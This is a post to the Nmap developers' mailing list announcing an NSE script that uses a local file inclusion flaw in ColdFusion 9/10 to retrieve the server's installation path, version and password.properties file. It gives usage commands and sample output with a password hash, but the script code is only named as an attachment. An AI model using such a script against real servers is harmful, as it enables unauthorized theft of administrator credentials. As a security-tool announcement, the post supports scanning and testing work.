http-coldfusion-subzero - Extracts the credentials file through a 0day LFI vulnerability in Coldfusion 9/10

[Paulino Calderon Pale <paulino () calderonpale com>]

description = [[
Attempts to retrieve the version, installation path and 
password.properties file in vulnerable ColdFusion 9/10 installations.

This is based on the exploit 'ColdSub-Zero.pyFusion v2'.
]]

---
-- @usage nmap -sV --script http-coldfusion-subzero <target>
-- @usage nmap -p80 --script http-coldfusion-subzero --script-args 
basepath=/cf/ <target>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-coldfusion-subzero:
-- |   absolute_path: C:\inetpub\wwwroot\CFIDE\adminapi\customtags
-- |   version: 9
-- |   password_properties: #Fri Mar 02 11:02:01 CST 2012
-- | rdspassword=
-- | password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0
-- |_encrypted=true
--
-- @xmloutput
-- <script id="http-coldfusion-subzero" output="&#xa; installation_path: 
C:\inetpub\wwwroot\CFIDE\adminapi\customtags&#xa;  version: 9&#xa;  
password_properties: #Fri Mar 02 17:03:01 CST 
2012&#xd;&#xa;rdspassword=&#xd;&#xa;password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0&#xd;&#xa;encrypted=true&#xd;&#xa;"><elem 
key="installation_path">C:\inetpub\wwwroot\CFIDE\adminapi\customtags</elem>
-- <elem key="version">9</elem>
-- <elem key="password_properties">#Fri Mar 02 17:03:01 CST 
2012&#xd;&#xa;rdspassword=&#xd;&#xa;password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0&#xd;&#xa;encrypted=true&#xd;&#xa;</elem>
-- </script>
-- @args http-coldfusion-subzero.basepath Base path. Default: /.
--
---

Attachment: http-coldfusion-subzero.nse
Description:

_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/